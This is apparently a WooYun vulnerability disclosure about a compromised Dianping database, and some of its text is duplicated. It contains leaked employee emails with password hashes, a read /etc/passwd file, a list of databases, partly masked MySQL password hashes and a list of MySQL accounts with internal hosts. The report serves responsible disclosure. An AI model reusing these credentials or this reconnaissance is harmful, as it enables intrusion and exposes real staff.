11,<blank>,<blank>,0ac370,192.168.224.166,luyan.wang@dianping.com,<blank>,1419410560,luyan.wang,b1310d21a491de8144fbe3d22f5bda7f,0,0
10,<blank>,<blank>,714abb,192.168.224.166,yuchen.yang@dianping.com,<blank>,1419407207,yuchen.yang,db51e0f98d8b68d8e0e2624e398da7ff,0,0
17,<blank>,<blank>,984b83,192.168.224.166,na.xiao@dianping.com,<blank>,1420443321,na.xiao,8a9ccbd02bab31f868768548c2f21d3f,0,0
13,<blank>,<blank>,441340,192.168.224.166,jianjun.tang@dianping.com,<blank>,1419500532,jianjun.tang,e36a6dfe9c0f6ba5e9635b5ce79869c9,0,0
14,<blank>,<blank>,d60614,192.168.224.166,yuhang.qian@dianping.com,<blank>,1419502253,yuhang.qian,025d86fb82e682a3a04a71e235e51385,0,0
15,<blank>,<blank>,643c5c,192.168.224.166,shanshan.xi@dianping.com,<blank>,1419503062,shanshan.xi,d6aff9814f0c3c27e5bf398a85d40777,0,0
18,<blank>,<blank>,dee8ae,192.168.224.166,juan.huang@dianping.com,<blank>,1420702557,juan.huang,9b8d9eb897ff17fb73bc46c3fd7229d9,0,0


成功进入后台

3333.JPG


数据库权限很高,直接读文件

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
nagios:x:498:500:nagios:/var/log/nagios:/bin/sh
mysql:x:497:501::/home/mysql:/bin/bash
zabbix:x:496:497:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin


就不一一列举了,把数据对应上系统是个麻烦事

漏洞证明:

available databases [58]:
[*] BAFSExpense
[*] BAFSWorkflow
[*] BAMenu
[*] Bonus
[*] CasServer
[*] DianPing
[*] DianPingAC
[*] DianPingAPI
[*] DianpingBA_FSAccounting
[*] DianpingBA_FSReport
[*] DianPingCOMM
[*] DianPingHR_CRM
[*] DianPingUC
[*] DPBAFCR
[*] DPBeauty
[*] DPEmployeeMD
[*] DPK2Server
[*] DPK2Server​
[*] DPMasterData
[*] DPMobile
[*] DPReview
[*] DPSaleForce
[*] DPSearch
[*] DPSearchOperation
[*] DPShop
[*] DWAnalytic
[*] Forum
[*] HRService
[*] ImageFlow
[*] information_schema
[*] mysql
[*] MySQLDianPingGroup_dbo
[*] nagios
[*] Overseas
[*] PartnerPlatform
[*] performance_schema
[*] Promotion
[*] rabbit
[*] RTXUM
[*] SearchKV
[*] SearchPortal
[*] slb
[*] test
[*] TopList
[*] WeChat
[*] WeiXinAdapter
[*] WeLife
[*] WeLife0
[*] WeLife1
[*] WeLife2
[*] WeLife3
[*] WeLife4
[*] WeLife5
[*] WeLife6
[*] WeLife7
[*] WeLife8
[*] WeLife9
[*] WeSMS


mysql用户账号密码!!

mask 区域
*****tic [*****
*****20254DEA5EACFCD*****
*****tic_r*****
*****981E366EC1A37DD*****
*****t_API*****
*****2128BE3070E74B5*****
*****dianpi*****
*****1D2A8F8924E019E*****
*****group *****
*****F597962BA620DCD*****
*****t_sys*****
*****067B1B617D2FC72*****
*****t_use*****
*****DDA26F7C6219F6E*****
*****enu *****
*****1AFB87AB32C640A*****
*****u_r [*****
*****C4CE140134CBC33*****
*****uty *****
*****7B49CC223334416*****
*****y_r [*****
*****C7D7E7CD1834F59*****
*****log *****
*****8D5C04C7D7E4162*****
*****us [*****
*****8F08CB86420B549*****
*****us_r*****
*****83D235AD1A9610F*****
*****dmin*****
*****366153C359C02C8*****
*****ser [*****
*****DEE42FD1618BB99*****
*****ing.q*****
*****708F2CB3DF360D9*****
*****wang *****
*****5213656986A833F*****
*****nitor*****
*****B34A8AADD5EDD54*****
*****kup [*****
*****1193F1B6035D1CE*****
*****e_aut*****
*****163B1CAE7814B68*****
*****D8F50592D4F400F*****
*****lose*****
*****D65842FC1F4EC23*****
*****_adpt*****
*****46089CC7980C814*****
*****dpt_r *****
*****A5405A2C8D67FDF*****
*****_cas *****
*****D94B63BD041DB5D*****
*****_cas_*****
*****0355726949D5EDF*****
*****_crm *****
*****0405883575EE6C9*****
*****_crm_*****
*****0443DB49E14177F*****
*****_dp_r*****
*****7F19E8E3ECBBC17*****
*****_emd *****
*****A6D9346832B3FB9*****
*****_emd_*****
*****41FC75906E501BD*****
*****_fcr *****
*****AAEAC714D0AC32B*****
*****_fcr_*****
*****8E3C67FCDCE6770*****
*****_job_*****
*****E65D24267815A28*****
*****29DE3CFAE8DF92B*****
*****perati*****
*****DA3D2BE39F9B606*****
*****_rtxu*****
*****DF3F416D65CC744*****
*****txum_r*****
*****E33027EDB6E1D31*****
*****_sys_*****
*****627BEAE116CB1D5*****
*****omm *****
*****AAF55278FD5C309*****
*****erver*****
*****394B046167A52D0*****
*****ver_r *****
*****27C00BC5B433A85*****
*****ver​*****
*****5B2DCB44A38D0C2*****
*****ver​*****
*****8CE95400D9EAAA5*****
*****der [*****
*****3C618F5BD689D7D*****
*****rdata *****
*****FCDA24667807ED7*****
*****rdata_*****
*****380E7ED47D8101E*****
*****ile [*****
*****F17D2378DDCFF42*****
*****ile_r*****
*****973EFCE44F26D5D*****
*****iew [*****
*****D70C1445BA8DBFA*****
*****iew_r*****
*****99F6626CC74C1F3*****
*****f [1*****
*****CD93B4082FD6DF2*****
*****f_r *****
*****AE2C453CFD9D869*****
*****hop *****
*****CA34EDF472FD58E*****
*****p_a [*****
*****40E2E78F9F27ACC*****
*****p_a_r*****
*****BAD2C1469449DC8*****
*****p_r [*****
*****8D7C804FA41A285*****
*****g.mia*****
*****F42283BF000F11B*****
*****m [1*****
*****A5AA97A70EFF96B*****
*****m_r *****
*****4880AE287B353D7*****
*****um [*****
*****F22CC8F33D04BAC*****
*****um_r*****
*****37528B3C2687E5B*****
*****shdp*****
*****12419AECFB29EE0*****
*****nting *****
*****BB7047F4A4451E9*****
*****nting_*****
*****477A59AEF6BC022*****
*****ense *****
*****A8BC1C6607208BF*****
*****ense_*****
*****B5E7E810815B35F*****
*****ort [*****
*****DCFBF44E9E385E6*****
*****ort_r*****
*****5C6A52F2135243D*****
*****kflow*****
*****0ECB73063BC5239*****
*****low_r *****
*****6CF963F11C5B20B*****
*****dmin*****
*****83B2BB6347E2538*****
*****roxy*****
*****d hash*****
*****wang *****
*****F290EB5D19240BC*****
*****vice *****
*****56D3E4E87C0DD9C*****
*****vice_*****
*****82B3B2F2D0E802C*****
*****flow *****
*****4F5F4306C0F8B0C*****
*****flow_*****
*****E1D813F7B2C4323*****
*****uang *****
*****8E611766B51B9F5*****
*****.lu [*****
*****F267A6D88FABA38*****
*****mirro*****
*****12CD0F582953572*****
*****gent *****
*****DEE42FD1618BB99*****
*****onito*****
*****DEE42FD1618BB99*****
*****ion *****
*****50BF30354468646*****
*****n_r [*****
*****193507FA6D0BA4C*****
*****dmin*****
*****F42283BF000F11B*****
*****1E19F9A5CADFD82*****
*****AE17257BBFA54E2*****
*****eas [*****
*****2414B29E3E8A75D*****
*****eas_r*****
*****4F6C80357FE290F*****
*****ng.li*****
*****0C9CD34BB8FB2CD*****
*****l [1*****
*****37BF97C19A2E88C*****
*****t [1*****
*****AEBF86EFCEFCAB5*****
*****n.yu*****
*****F7930F2ECCB86D9*****
*****hKV [*****
*****3AC0381F1899C87*****
*****ortal *****
*****00495BC3AEA3F1B*****
*****ortal_*****
*****25CBC251267D12B*****
*****lb *****
*****E10FD3546F1E429*****
*****_r [*****
*****F1BB23CA492E69F*****
*****r_L1U0*****
*****d hash*****
*****r_L2U0*****
*****d hash*****
*****r_L3U0*****
*****d hash*****
*****r_L3U1*****
*****d hash*****
*****list*****
*****F8AF09E1D174541*****
*****st_r *****
*****D5B5CFC0A350EDF*****
*****hat *****
*****7CE26E9C8E1EE64*****
*****t_r [*****
*****FD5AF03FBA35430*****
*****ife *****
*****45A5301A4B909EB*****
*****e_r [*****
*****A8037C0A01794EE*****
*****ms [*****
*****69A3B9F7722B869*****
*****ms_r*****
*****06B04994923DE78*****
*****an.li*****
*****71B77E34ACDE9B*****


[*] 'analytic'@'10.1.%'
[*] 'analytic'@'10.101.%'
[*] 'analytic'@'10.128.%'
[*] 'analytic'@'10.2.%'
[*] 'analytic'@'192.168.%'
[*] 'analytic_r'@'10.1.%'
[*] 'analytic_r'@'10.101.%'
[*] 'analytic_r'@'10.128.%'
[*] 'analytic_r'@'10.2.%'
[*] 'analytic_r'@'192.168.%'
[*] 'aspnet_API'@'10.1.%'
[*] 'aspnet_API'@'10.128.%.%'
[*] 'aspnet_API'@'192.168.%'
[*] 'aspnet_dianping'@'10.1.%'
[*] 'aspnet_dianping'@'10.128.%'
[*] 'aspnet_dianping'@'10.254.25%'
[*] 'aspnet_dianping'@'192.168.%'
[*] 'aspnet_group'@'10.1.%'
[*] 'aspnet_group'@'10.128.%.%'
[*] 'aspnet_group'@'192.168.%'
[*] 'aspnet_sys'@'10.1.%'
[*] 'aspnet_sys'@'10.128.%.%'
[*] 'aspnet_sys'@'192.168.%'
[*] 'aspnet_user'@'10.1.%'
[*] 'aspnet_user'@'10.128.%.%'
[*] 'aspnet_user'@'192.168.%'
[*] 'bamenu'@'10.1.%'
[*] 'bamenu'@'10.101.%'
[*] 'bamenu'@'10.128.%'
[*] 'bamenu'@'10.2.%'
[*] 'bamenu'@'192.168.%'
[*] 'bamenu_r'@'10.1.%'
[*] 'bamenu_r'@'10.101.%'
[*] 'bamenu_r'@'10.128.%'
[*] 'bamenu_r'@'10.2.%'
[*] 'bamenu_r'@'192.168.%'
[*] 'beauty'@'10.1.%'
[*] 'beauty'@'10.101.%'
[*] 'beauty'@'10.128.%'
[*] 'beauty'@'10.2.%'
[*] 'beauty'@'192.168.%'
[*] 'beauty_r'@'10.1.%'
[*] 'beauty_r'@'10.101.%'
[*] 'beauty_r'@'10.128.%'
[*] 'beauty_r'@'10.2.%'
[*] 'beauty_r'@'192.168.%'
[*] 'binlog'@'10.1.%'
[*] 'binlog'@'10.128.%.%'
[*] 'binlog'@'192.168.%'
[*] 'bonus'@'10.1.%'
[*] 'bonus'@'10.101.%'
[*] 'bonus'@'10.128.%'
[*] 'bonus'@'10.2.%'
[*] 'bonus'@'192.168.%'
[*] 'bonus_r'@'10.1.%'
[*] 'bonus_r'@'10.101.%'
[*] 'bonus_r'@'10.128.%'
[*] 'bonus_r'@'10.2.%'
[*] 'bonus_r'@'192.168.%'
[*] 'CMAdmin'@'10.128.%.%'
[*] 'CMAdmin'@'192.168.%'
[*] 'dbi_user'@'10.128.%.%'
[*] 'dbi_user'@'192.168.%'
[*] 'dianping.qa'@'10.1.77.%'
[*] 'dianping.qa'@'10.128.%'
[*] 'dianping.qa'@'192.168.%'
[*] 'dong.wang'@'10.1.1.62'
[*] 'dp_monitor'@'10.1.1.111'
[*] 'dp_monitor'@'localhost'
[*] 'dpbackup'@'localhost'
[*] 'dpbase_auth'@'10.1.2.119'
[*] 'dpbase_auth'@'10.1.2.139'
[*] 'dpbase_auth'@'10.1.77.211'
[*] 'dpclose'@'localhost'
[*] 'dpcom_adpt'@'10.1.%'
[*] 'dpcom_adpt'@'10.101.%'
[*] 'dpcom_adpt'@'10.128.%'
[*] 'dpcom_adpt'@'10.2.%'
[*] 'dpcom_adpt'@'192.168.%'
[*] 'dpcom_adpt_r'@'10.1.%'
[*] 'dpcom_adpt_r'@'10.101.%'
[*] 'dpcom_adpt_r'@'10.128.%'
[*] 'dpcom_adpt_r'@'10.2.%'
[*] 'dpcom_adpt_r'@'192.168.%'
[*] 'dpcom_cas'@'10.1.%'
[*] 'dpcom_cas'@'10.128.%'
[*] 'dpcom_cas'@'192.168.%'
[*] 'dpcom_cas_r'@'10.1.%'
[*] 'dpcom_cas_r'@'10.128.%'
[*] 'dpcom_cas_r'@'192.168.%'
[*] 'dpcom_crm'@'10.1.%'
[*] 'dpcom_crm'@'10.101.%'
[*] 'dpcom_crm'@'10.128.%'
[*] 'dpcom_crm'@'10.2.%'
[*] 'dpcom_crm'@'192.168.%'
[*] 'dpcom_crm_r'@'10.1.%'
[*] 'dpcom_crm_r'@'10.101.%'
[*] 'dpcom_crm_r'@'10.128.%'
[*] 'dpcom_crm_r'@'10.2.%'
[*] 'dpcom_crm_r'@'192.168.%'
[*] 'dpcom_dp_r'@'10.128.%.%'
[*] 'dpcom_dp_r'@'192.168.%'
[*] 'dpcom_emd'@'10.1.%'
[*] 'dpcom_emd'@'10.101.%'
[*] 'dpcom_emd'@'10.128.%'
[*] 'dpcom_emd'@'10.2.%'
[*] 'dpcom_emd'@'192.168.%'
[*] 'dpcom_emd_r'@'10.1.%'
[*] 'dpcom_emd_r'@'10.101.%'
[*] 'dpcom_emd_r'@'10.128.%'
[*] 'dpcom_emd_r'@'10.2.%'
[*] 'dpcom_emd_r'@'192.168.%'
[*] 'dpcom_fcr'@'10.1.%'
[*] 'dpcom_fcr'@'10.128.%'
[*] 'dpcom_fcr'@'192.168.%'
[*] 'dpcom_fcr_r'@'10.1.%'
[*] 'dpcom_fcr_r'@'10.128.%'
[*] 'dpcom_fcr_r'@'192.168.%'
[*] 'dpcom_job_r'@'10.1.%'
[*] 'dpcom_job_r'@'10.128.%.%'
[*] 'dpcom_job_r'@'192.168.%'
[*] 'dpcom_operation'@'10.1.%'
[*] 'dpcom_operation'@'10.101.%'
[*] 'dpcom_operation'@'10.128.%'
[*] 'dpcom_operation'@'10.2.%'
[*] 'dpcom_operation'@'192.168.%'
[*] 'dpcom_rtxum'@'10.1.%'
[*] 'dpcom_rtxum'@'10.128.%'
[*] 'dpcom_rtxum'@'192.168.%'
[*] 'dpcom_rtxum_r'@'10.1.%'
[*] 'dpcom_rtxum_r'@'10.128.%'
[*] 'dpcom_rtxum_r'@'192.168.%'
[*] 'dpcom_sys_r'@'192.168.%'
[*] 'dpcomm'@'10.1.%'
[*] 'dpcomm'@'10.128.%'
[*] 'DPK2Server'@'10.1.%'
[*] 'DPK2Server'@'10.101.%'
[*] 'DPK2Server'@'10.128.%'
[*] 'DPK2Server'@'10.2.%'
[*] 'DPK2Server'@'192.168.%'
[*] 'DPK2Server_r'@'10.1.%'
[*] 'DPK2Server_r'@'10.101.%'
[*] 'DPK2Server_r'@'10.128.%'
[*] 'DPK2Server_r'@'10.2.%'
[*] 'DPK2Server_r'@'192.168.%'
[*] 'dpk2server​'@'10.1.%'
[*] 'dpk2server​'@'10.101.%'
[*] 'dpk2server​'@'10.128.%'
[*] 'dpk2server​'@'10.2.%'
[*] 'dpk2server​'@'192.168.%'
[*] 'dpk2server​_r'@'10.1.%'
[*] 'dpk2server​_r'@'10.101.%'
[*] 'dpk2server​_r'@'10.128.%'
[*] 'dpk2server​_r'@'10.2.%'
[*] 'dpk2server​_r'@'192.168.%'
[*] 'dploader'@'localhost'
[*] 'dpmasterdata'@'10.1.%'
[*] 'dpmasterdata'@'10.101.%'
[*] 'dpmasterdata'@'10.128.%'
[*] 'dpmasterdata'@'10.2.%'
[*] 'dpmasterdata'@'192.168.%'
[*] 'dpmasterdata_r'@'10.1.%'
[*] 'dpmasterdata_r'@'10.101.%'
[*] 'dpmasterdata_r'@'10.128.%'
[*] 'dpmasterdata_r'@'10.2.%'
[*] 'dpmasterdata_r'@'192.168.%'
[*] 'dpmobile'@'10.1.%'
[*] 'dpmobile'@'10.128.%'
[*] 'dpmobile'@'192.168.%'
[*] 'dpmobile_r'@'10.1.%'
[*] 'dpmobile_r'@'10.128.%'
[*] 'dpmobile_r'@'192.168.%'
[*] 'dpreview'@'10.1.%'
[*] 'dpreview'@'10.101.%'
[*] 'dpreview'@'10.128.%'
[*] 'dpreview'@'10.2.%'
[*] 'dpreview'@'192.168.%'
[*] 'dpreview_r'@'10.1.%'
[*] 'dpreview_r'@'10.101.%'
[*] 'dpreview_r'@'10.128.%'
[*] 'dpreview_r'@'10.2.%'
[*] 'dpreview_r'@'192.168.%'
[*] 'dpsf'@'10.1.%'
[*] 'dpsf'@'10.101.%'
[*] 'dpsf'@'10.128.%'
[*] 'dpsf'@'10.2.%'
[*] 'dpsf'@'192.168.%'
[*] 'dpsf_r'@'10.1.%'
[*] 'dpsf_r'@'10.101.%'
[*] 'dpsf_r'@'10.128.%'
[*] 'dpsf_r'@'10.2.%'
[*] 'dpsf_r'@'192.168.%'
[*] 'dpshop'@'10.1.%'
[*] 'dpshop'@'10.101.%'
[*] 'dpshop'@'10.128.%'
[*] 'dpshop'@'10.2.%'
[*] 'dpshop'@'192.168.%'
[*] 'dpshop_a'@'10.1.%'
[*] 'dpshop_a'@'10.101.%'
[*] 'dpshop_a'@'10.128.%'
[*] 'dpshop_a'@'10.2.%'
[*] 'dpshop_a'@'192.168.%'
[*] 'dpshop_a_r'@'10.1.%'
[*] 'dpshop_a_r'@'10.101.%'
[*] 'dpshop_a_r'@'10.128.%'
[*] 'dpshop_a_r'@'10.2.%'
[*] 'dpshop_a_r'@'192.168.%'
[*] 'dpshop_r'@'10.1.%'
[*] 'dpshop_r'@'10.101.%'
[*] 'dpshop_r'@'10.128.%'
[*] 'dpshop_r'@'10.2.%'
[*] 'dpshop_r'@'192.168.%'
[*] 'faping.miao'@'10.1.1.62'
[*] 'form'@'10.1.%'
[*] 'form'@'10.128.%'
[*] 'form'@'10.254.251.%'
[*] 'form'@'192.168.%'
[*] 'form_r'@'10.1.%'
[*] 'form_r'@'10.128.%'
[*] 'form_r'@'192.168.%'
[*] 'forum'@'10.1.%'
[*] 'forum'@'10.101.%'
[*] 'forum'@'10.128.%'
[*] 'forum'@'10.2.%'
[*] 'forum'@'192.168.%'
[*] 'forum_r'@'10.1.%'
[*] 'forum_r'@'10.101.%'
[*] 'forum_r'@'10.128.%'
[*] 'forum_r'@'10.2.%'
[*] 'forum_r'@'192.168.%'
[*] 'freshdp'@'10.128.%.%'
[*] 'freshdp'@'192.168.%'
[*] 'FSAccounting'@'10.1.%'
[*] 'FSAccounting'@'10.101.%'
[*] 'FSAccounting'@'10.128.%'
[*] 'FSAccounting'@'10.2.%'
[*] 'FSAccounting'@'192.168.%'
[*] 'FSAccounting_r'@'10.1.%'
[*] 'FSAccounting_r'@'10.101.%'
[*] 'FSAccounting_r'@'10.128.%'
[*] 'FSAccounting_r'@'10.2.%'
[*] 'FSAccounting_r'@'192.168.%'
[*] 'fsexpense'@'10.1.%'
[*] 'fsexpense'@'10.101.%'
[*] 'fsexpense'@'10.128.%'
[*] 'fsexpense'@'10.2.%'
[*] 'fsexpense'@'192.168.%'
[*] 'fsexpense_r'@'10.1.%'
[*] 'fsexpense_r'@'10.101.%'
[*] 'fsexpense_r'@'10.128.%'
[*] 'fsexpense_r'@'10.2.%'
[*] 'fsexpense_r'@'192.168.%'
[*] 'FSReport'@'10.1.%'
[*] 'FSReport'@'10.101.%'
[*] 'FSReport'@'10.128.%'
[*] 'FSReport'@'10.2.%'
[*] 'FSReport'@'192.168.%'
[*] 'FSReport_r'@'10.1.%'
[*] 'FSReport_r'@'10.101.%'
[*] 'FSReport_r'@'10.128.%'
[*] 'FSReport_r'@'10.2.%'
[*] 'FSReport_r'@'192.168.%'
[*] 'fsworkflow'@'10.1.%'
[*] 'fsworkflow'@'10.101.%'
[*] 'fsworkflow'@'10.128.%'
[*] 'fsworkflow'@'10.2.%'
[*] 'fsworkflow'@'192.168.%'
[*] 'fsworkflow_r'@'10.1.%'
[*] 'fsworkflow_r'@'10.101.%'
[*] 'fsworkflow_r'@'10.128.%'
[*] 'fsworkflow_r'@'10.2.%'
[*] 'fsworkflow_r'@'192.168.%'
[*] 'gpadmin'@'10.1.1.239'
[*] 'haproxy'@'192.168.%'
[*] 'hong.wang'@'10.128.%.%'
[*] 'hong.wang'@'192.168.%'
[*] 'hrservice'@'10.1.%'
[*] 'hrservice'@'10.101.%'
[*] 'hrservice'@'10.128.%'
[*] 'hrservice'@'10.2.%'
[*] 'hrservice'@'192.168.%'
[*] 'hrservice_r'@'10.1.%'
[*] 'hrservice_r'@'10.101.%'
[*] 'hrservice_r'@'10.128.%'
[*] 'hrservice_r'@'10.2.%'
[*] 'hrservice_r'@'192.168.%'
[*] 'imageflow'@'10.1.%'
[*] 'imageflow'@'10.101.%'
[*] 'imageflow'@'10.128.%'
[*] 'imageflow'@'10.2.%'
[*] 'imageflow'@'192.168.%'
[*] 'imageflow_r'@'10.1.%'
[*] 'imageflow_r'@'10.101.%'
[*] 'imageflow_r'@'10.128.%'
[*] 'imageflow_r'@'10.2.%'
[*] 'imageflow_r'@'192.168.%'
[*] 'jin.huang'@'10.128.%.%'
[*] 'jin.huang'@'192.168.%'
[*] 'junyi.lu'@'10.1.1.%'
[*] 'mail_mirror'@'10.1.%'
[*] 'mmm_agent'@'10.1.77.%'
[*] 'mmm_monitor'@'10.1.77.%'
[*] 'motion'@'10.1.%'
[*] 'motion'@'10.101.%'
[*] 'motion'@'10.128.%'
[*] 'motion'@'10.2.%'
[*] 'motion'@'192.168.%'
[*] 'motion_r'@'10.1.%'
[*] 'motion_r'@'10.101.%'
[*] 'motion_r'@'10.128.%'
[*] 'motion_r'@'10.2.%'
[*] 'motion_r'@'192.168.%'
[*] 'myadmin'@'10.1.%'
[*] 'myadmin'@'10.1.1.186'
[*] 'myadmin'@'10.1.1.231'
[*] 'myadmin'@'10.1.1.62'
[*] 'myadmin'@'192.168.%'
[*] 'myadmin'@'localhost'
[*] 'overseas'@'10.1.%'
[*] 'overseas'@'10.101.%'
[*] 'overseas'@'10.128.%'
[*] 'overseas'@'10.2.%'
[*] 'overseas'@'192.168.%'
[*] 'overseas_r'@'10.1.%'
[*] 'overseas_r'@'10.101.%'
[*] 'overseas_r'@'10.128.%'
[*] 'overseas_r'@'10.2.%'
[*] 'overseas_r'@'192.168.%'
[*] 'qunying.liu'@'10.1.%'
[*] 'repl'@'10.1.77.%'
[*] 'root'@'localhost'
[*] 'ryan.yu'@'10.128.%.%'
[*] 'ryan.yu'@'10.254.25%'
[*] 'ryan.yu'@'192.168.%'
[*] 'SearchKV'@'10.128.%.%'
[*] 'SearchKV'@'192.168.%'
[*] 'searchportal'@'10.1.%'
[*] 'searchportal'@'10.128.%'
[*] 'searchportal'@'192.168.%'
[*] 'searchportal_r'@'10.1.%'
[*] 'searchportal_r'@'10.128.%'
[*] 'searchportal_r'@'192.168.%'
[*] 'slb'@'10.1.%'
[*] 'slb'@'10.101.%'
[*] 'slb'@'10.128.%'
[*] 'slb'@'10.2.%'
[*] 'slb'@'192.168.%'
[*] 'slb_r'@'10.1.%'
[*] 'slb_r'@'10.101.%'
[*] 'slb_r'@'10.128.%'
[*] 'slb_r'@'10.2.%'
[*] 'slb_r'@'192.168.%'
[*] 'tempuser_L1U0'@'10.254.25%'
[*] 'tempuser_L1U0'@'192.168.%'
[*] 'tempuser_L2U0'@'10.254.25%'
[*] 'tempuser_L2U0'@'192.168.%'
[*] 'tempuser_L3U0'@'10.254.25%'
[*] 'tempuser_L3U0'@'192.168.%'
[*] 'tempuser_L3U1'@'10.254.25%'
[*] 'tempuser_L3U1'@'192.168.%'
[*] 'toplist'@'10.1.%'
[*] 'toplist'@'10.101.%'
[*] 'toplist'@'10.128.%'
[*] 'toplist'@'10.2.%'
[*] 'toplist'@'192.168.%'
[*] 'toplist_r'@'10.1.%'
[*] 'toplist_r'@'10.101.%'
[*] 'toplist_r'@'10.128.%'
[*] 'toplist_r'@'10.2.%'
[*] 'toplist_r'@'192.168.%'
[*] 'wechat'@'10.1.%'
[*] 'wechat'@'10.101.%'
[*] 'wechat'@'10.128.%'
[*] 'wechat'@'10.2.%'
[*] 'wechat'@'192.168.%'
[*] 'wechat_r'@'10.1.%'
[*] 'wechat_r'@'10.101.%'
[*] 'wechat_r'@'10.128.%'
[*] 'wechat_r'@'10.2.%'
[*] 'wechat_r'@'192.168.%'
[*] 'welife'@'10.1.%'
[*] 'welife'@'10.101.%'
[*] 'welife'@'10.128.%'
[*] 'welife'@'10.2.%'
[*] 'welife'@'192.168.%'
[*] 'welife_r'@'10.1.%'
[*] 'welife_r'@'10.101.%'
[*] 'welife_r'@'10.128.%'
[*] 'welife_r'@'10.2.%'
[*] 'welife_r'@'192.168.%'
[*] 'wesms'@'10.1.%'
[*] 'wesms'@'10.101.%'
[*] 'wesms'@'10.128.%'
[*] 'wesms'@'10.2.%'
[*] 'wesms'@'192.168.%'
[*] 'wesms_r'@'10.1.%'
[*] 'wesms_r'@'10.101.%'
[*] 'wesms_r'@'10.128.%'
[*] 'wesms_r'@'10.2.%'
[*] 'wesms_r'@'192.168.%'
[*] 'zhiyuan.li'@'10.1.%'
[*] 'zhiyuan.li'@'10.128.%.%'
[*] 'zhiyuan.li'@'192.168.%'
</code>
这些数据可能导致整个业务线数据泄露
库太多了,不好分辨,随便找了一个试试
看到forum库,尝试找dz论坛,找了好久,终于找到
bbs.51ping.com/bbs

mask 区域
*****egdate,username,passwo*****
*****m,<blank>,1419326409,admi*****
*****ing.com,<blank>,1419498405,zhi*****
*****ping.com,<blank>,1419410560,l*****
*****ing.com,<blank>,1419407207,yuc*****
*****ing.com,<blank>,1420443321,n*****
*****ping.com,<blank>,1419500532,ji*****
*****ing.com,<blank>,1419502253,yuh*****
*****ing.com,<blank>,1419503062,sha*****
*****ping.com,<blank>,1420702557,j*****


成功进入后台

3333.JPG


数据库权限很高,直接读文件

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
nagios:x:498:500:nagios:/var/log/nagios:/bin/sh
mysql:x:497:501::/home/mysql:/bin/bash
zabbix:x:496:497:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin

修复方案:

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-09 15:22

厂商回复:

感谢,一次重大失误的配置造成的

最新状态:

暂无